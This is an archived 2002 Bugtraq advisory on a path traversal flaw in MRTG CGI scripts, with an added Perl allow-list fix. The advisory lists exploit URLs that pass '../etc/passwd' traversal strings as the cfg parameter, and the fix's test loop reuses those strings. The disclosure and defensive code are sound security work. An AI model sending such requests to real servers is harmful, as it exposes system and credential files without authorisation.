Bugtraq mailing list archives

Subject: new advisory
From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300

---=== UkR Security Team advisory ===---

Name          : MRTG CGI script "show files" Vulnerability
About         : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network links. MRTG generates HTML pages containing GIF images which provide a live visual representation of this traffic.
Product vendor: MRTG / http://www.mrtg.org
Problem       : The problem lies in incorrect validation of user-submitted (browser-supplied) information, which can reveal the first line of any file on the system where the script is installed.
Workaround    : This will help somewhat: $input =~ s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit       : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
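Added here as a defensive illustration; it is not part of the advisory and not MRTG's own code. The workaround substitution above is a character class, so it strips every '.', '/', '(', ')' and '|' character rather than matching the ".." or "/" alternation it appears to intend, and removing characters from a hostile value is weaker than refusing anything that is not on an allow-list. The Perl below uses a hypothetical helper, safe_cfg_path, and a constructed temporary config directory; it admits only a plain file name that resolves inside the configured directory and refuses the cfg values from the exploit URLs.

```perl
#!/usr/bin/perl
# Added example, not part of the advisory or of MRTG: an allow-list check
# for a CGI "cfg" parameter so that it can only name a file inside one
# trusted directory. Directory and file names below are constructed for
# the demo; safe_cfg_path is a hypothetical helper name.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Returns the canonical path of the requested config file, or undef if the
# request must be refused.
sub safe_cfg_path {
    my ($cfg_dir, $cfg) = @_;

    # 1. Allow-list the name itself: letters, digits, '_' and '-', with an
    #    optional ".cfg" suffix. No '/', no '\', no "..", no leading dot,
    #    so "../../../../etc/passwd" never reaches the file system at all.
    return undef unless defined $cfg && $cfg =~ /^([A-Za-z0-9_-]+(?:\.cfg)?)\z/;
    my $name = $1;    # the capture also untaints the value under perl -T

    # 2. Build the path from the trusted directory, never from the input,
    #    and insist that it names an existing regular file.
    my $path = File::Spec->catfile($cfg_dir, $name);
    return undef unless -f $path;

    # 3. Resolve symlinks on both sides and confirm the file is still
    #    located under $cfg_dir.
    my $base = realpath($cfg_dir) or return undef;
    my $real = realpath($path)    or return undef;
    return undef unless index($real, "$base/") == 0;
    return $real;
}

# --- demo with a constructed config directory (removed on exit) ---
my $dir = tempdir(CLEANUP => 1);
open my $fh, '>', "$dir/router1.cfg" or die "cannot create sample: $!";
print $fh "# constructed sample MRTG config\n";
close $fh;

for my $cfg ('router1.cfg',
             '../../../../../../../../etc/passwd',
             '..%2F..%2Fetc%2Fpasswd',
             '.htpasswd',
             'nosuch.cfg') {
    my $ok = safe_cfg_path($dir, $cfg);
    printf "%-40s => %s\n", $cfg, defined $ok ? "allowed ($ok)" : 'refused';
}
```

Only router1.cfg is allowed; the traversal string, its URL-encoded variant, the dot-file and the non-existent name are all refused before any file is opened. The allow-list is deliberately narrow: if a deployment names its configs differently, widen the character class rather than falling back to stripping characters out of the input.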

